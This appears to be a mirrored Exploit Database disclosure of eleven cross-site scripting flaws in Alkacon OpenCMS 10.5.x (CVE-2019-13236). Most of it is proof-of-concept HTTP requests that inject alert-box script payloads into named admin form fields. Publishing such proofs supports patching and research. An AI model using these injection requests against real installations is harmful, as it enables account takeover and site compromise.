Alkacon OpenCMS 10.5.x – Cross-Site Scripting (2)

• Exploit Database
• 116 阅读

• 作者： Aetsu
  日期： 2019-09-02
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47339/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

  # Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management # Google Dork: N/A # Date: 18/07/2019 # Exploit Author: Aetsu # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: 10.5.x # Tested on: 10.5.5 / 10.5.4 # CVE : CVE-2019-13236   1. In Site Management > New site (Stored XSS): - Affected resource title.0: POC: </code><code> POST /system/workplace/admin/sites/new.jsp HTTP/1.1 Host: example.com title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se </code><code> 2. In Treeview (Reflected XSS): - Affected resource type: POC: </code><code> http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type= </script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite= </code><code> 3. In Workspace tools > Login message (Stored XSS): - Affected resource message.0: POC: </code><code> POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1 Host: example.com enabled.0=true&enabled.0.value=true&message.0=<svg onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename= </code><code> 4. In Index sources > View index sources > New index source (Stored XSS): - Affected resource name.0: POC: </code><code> POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1 Host: example.com name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename= </code><code> 5. In Index sources > View field configuration > New field configuration (Stored XSS): - Affected resource name.0: POC: </code><code> POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1 Host: example.com name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename= </code><code> 6. In Account Management > Impor/Export user data (Reflected XSS): - Affected resource oufqn: POC: </code><code> POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp HTTP/1.1 Host: example.com groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename= </code><code> 7. In Account Management > Group Management > New Group (Stored XSS): - Affected resources name.0 and description.0: POC:<code></code><code> POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1 Host: example.com name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27 </code><code> 8. In Account Management > Organizational Unit > Organizational Unit Management > New sub organizational unit (Stored XSS): - Affected resources parentOuDesc.0 and resources.0: POC:<code></code><code> POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1 Host: example.com name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D </code><code> 9. In Link Validator > External Link Validator > Validate External Links (Reflected XSS): - Affected resources reporttype, reportcontinuekey and title: POC:<code></code><code> POST /system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks HTTP/1.1 Host: example.com dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK </code><code> 10. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS): - Affected resources destinationDir.0, imageGallery.0, linkGallery.0, downloadGallery.0: POC:<code></code><code> POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1 Host: example.com ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="inputDir.0" . ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="destinationDir.0" /whbo0"><script>alert(1)</script>nrbhd ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="imageGallery.0" ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="downloadGallery.0" ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="linkGallery.0" [...] </code><code> 11. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS): - Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and downloadGallery.0: POC: </code><code> POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1 Host: example.com ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="inputDir.0" gato ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="destinationDir.0" testszfgw"><script>alert(1)</script>vqln7 ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="imageGallery.0" test ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="downloadGallery.0" test ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="linkGallery.0" test [...] </code><code> Extended POCs: https://aetsu.github.io/OpenCms